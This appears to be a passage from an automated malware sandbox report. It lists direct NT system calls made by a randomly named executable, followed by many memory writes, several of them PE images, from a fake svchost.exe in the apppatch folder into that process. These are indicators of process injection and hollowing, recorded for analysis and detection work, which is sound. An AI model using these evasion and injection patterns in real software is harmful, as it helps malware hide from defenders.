Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtCreateFile: Direct from: 0x77542FEC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtOpenFile: Direct from: 0x77542DCC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtEnumerateValueKey: Direct from: 0x77542BAC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtSetInformationThread: Direct from: 0x77542ECC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtQueryInformationToken: Direct from: 0x77542CAC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtTerminateThread: Direct from: 0x77542FCC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtDeviceIoControlFile: Direct from: 0x77542AEC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtAllocateVirtualMemory: Direct from: 0x77542BEC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtQueryVolumeInformationFile: Direct from: 0x77542F2C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtSetInformationFile: Direct from: 0x77542D0C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtOpenSection: Direct from: 0x77542E0C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtQuerySystemInformation: Direct from: 0x775448CC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtSetInformationThread: Direct from: 0x775363F9
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtClose: Direct from: 0x77542B6C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtCreateKey: Direct from: 0x77542C6C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtSetInformationThread: Direct from: 0x77542B4C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtQueryAttributesFile: Direct from: 0x77542E6C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtOpenKeyEx: Direct from: 0x77543C9C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtQueryInformationProcess: Direct from: 0x77542C26
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtDelayExecution: Direct from: 0x77542DDC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtEnumerateKey: Direct from: 0x77542DBC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtAllocateVirtualMemory: Direct from: 0x77542BFC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtQuerySystemInformation: Direct from: 0x1C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtQuerySystemInformation: Direct from: 0x77542DFC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtWriteFile: Direct from: 0x77542AFC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtResumeThread: Direct from: 0x775436AC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtAllocateVirtualMemory: Direct from: 0x7754309C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtUnmapViewOfSection: Direct from: 0x77542D3C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtNotifyChangeKey: Direct from: 0x77543C2C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtCreateMutant: Direct from: 0x775435CC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe NtMapViewOfSection: Direct from: 0x77542D1C
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: B92000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: BE2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: B12000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: F92000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: CF2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1452000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D22000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: A12000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: FF2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: EF2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: A82000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: DC2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C52000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D52000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: F72000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1272000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1552000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1252000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: E92000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: AD2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 832000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: FD2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 9B2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 14A2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 9B2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1432000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 602000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D62000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 892000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1332000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C12000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1542000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1052000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 11C0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 11C1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 11C2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1215000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1340000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1341000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1342000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1395000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 14B0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 14B1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 14B2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1505000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 2D00000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 2D01000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 2D02000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 2D55000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 2260000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 2261000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 2262000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 22B5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 24B0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 24B1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 24B2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 2505000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: A50000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: A51000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: A52000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: AA5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 2C70000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 2C71000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 2C72000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 2CC5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 620000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 621000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 622000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 675000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 2700000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 2701000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 2702000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 2755000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 28D0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 28D1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 28D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 2925000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 27F0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 27F1000Jump to behavior
